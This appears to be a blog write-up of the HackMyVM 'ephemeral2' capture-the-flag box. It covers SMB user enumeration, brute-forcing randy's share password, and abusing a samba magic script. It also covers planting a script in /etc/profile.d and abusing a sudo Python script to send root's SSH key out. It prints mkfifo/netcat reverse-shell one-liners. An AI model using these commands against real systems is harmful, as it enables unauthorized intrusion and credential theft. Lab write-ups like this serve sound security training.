Skip to content

Hackmyvm – ephemeral2

The free CTF Challenge web site “” have an other medium level vm called ‘ephemeral2‘ for us to download, enumerate and get some flags. In this write-up will try to describe my method and thought process on how I completed this hackmyvm ephemeral2 CTF challenge.

Table of Contents

Setup for hackmyvm ephemeral2

The vm can be downloaded from as an OVA file and imported into Oracle VirtualBox.

My Network,

  • – This is my BlackArch enumeration system.
  • – This is the ephemeral2 vm.

For enumeration of the hackmyvm ephemeral2 Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.



The first command to run is nmap for network services enumeration.

Only 4 ports open

There are only 4 ports open,

  • 80, http,
  • 22, ssh,
  • 139 and 445, smb,

Using a web fuzzer with the website and I found nothing of interest. So lets dig deeper into the samba part. And use the below command to see if we can get any user information.


enum4linux -U

After a minute of it running we get a username,

Account: randy    Name: randy 

Now to get the share list

 enum4linux -S

This results in a list of the directories shared by samba. There is only one of interest and its below.

Sharename       Type      Comment
---------       ----      ----
SYSADMIN        Disk

But this name and share is not enough to mount a remote file system (SYSADMIN). So I have to use smbrute to try and get the password. I used the rockyou.txt password and it took a long time, be prepared to wait. Also make sure you have smbclient installed before you run the smbrute script.

The script needs three things to run. A file with the usernames, a file with the passwords and a target. So use a file with one user name “randy” and the rockyou.txt password list on github. If rockyou.txt is too big you will have to break it up. Hint: The password is in the top 2000 of this file.

python3 ./ -t -u /tmp/users -p /opt/rockyou.txt

SMB Mount

Eventually you will get the password. Just wait. And once you have the password you can mount up the share.

 sudo mount -t cifs -o username=randy // /mnt
smb mount

Some interesting files, take a look at them. The one I am most interested is in the smb.conf file. And “randys” share configuration.

randys config

Reverse Shell

Look up what magic script does. It’s really interesting. So after you look that up take a look at creating a reverse shell script,

vim /tmp/

Put in the below contents.


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f

Now in another window run on the enumeration system, open a netcat to capture the shell.

nc -vlnp 4444

And copy your reverse shell script into the mount. If you are not root be sure to use sudo.

sudo cp /tmp/ /mnt/smbscript.elf
Terminal 1

And you should get a shell on the netcat Terminal window.

Terminal 2

More Enumeration

After some poking around you can find two things.

  • /etc/profile.d is writable
  • There is a job that runs ssh for the user ralph, in cron, every minute (see /etc/crontab).

Another Reverse Shell

So all scripts in /etc/profile.d are run when someone logs in. Therefore when the ssh script runs for the user “ralph” it can be used to spawn another reverse shell. So modify the reverse shell script we created earlier to look like the below.


rm /tmp/k;mkfifo /tmp/k;cat /tmp/k|sh -i 2>&1|nc 4445 >/tmp/k

And put it into “/etc/profile.d/” on the host. Then in another window or the enumeration host, run another netcat.

nc -vlnp 4445

and wait…..

ralphs shell

Now we have another shell, this time as the user “ralph”.

Stabilize the shell.

stabilize l


Take a look at sudo -l


This script does something interesting to the files input into it. Try to figure it out.

Netcat One More time

On yet another terminal on your enumeration host, run netcat again.

nc -vlnp 4446

Now run the sudo command

sudo /usr/bin/python3 /home/ralph/

When “File Path” pops up, put in

File path: /root/.ssh/id_rsa

When IP comes up, put in the ip of your enumeration host and the port you ran netcat on.

IP address:

And all going well, the root ssh private key will pop up on the netcat window.

Root Shell

Save it on the ephemeral system somewhere (I used /tmp/key.pem). Set the permissions to 600 and use the below to get onto the system as root.

vi /tmp/key.pem
chmod 600 /tmp/key.pem
ssh -i /tmp/key.pem root@localhost
root access


I found this room challenging and engaging. Thanks to rpj7 for pointing out that running the same command more than once can yield different results.


Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *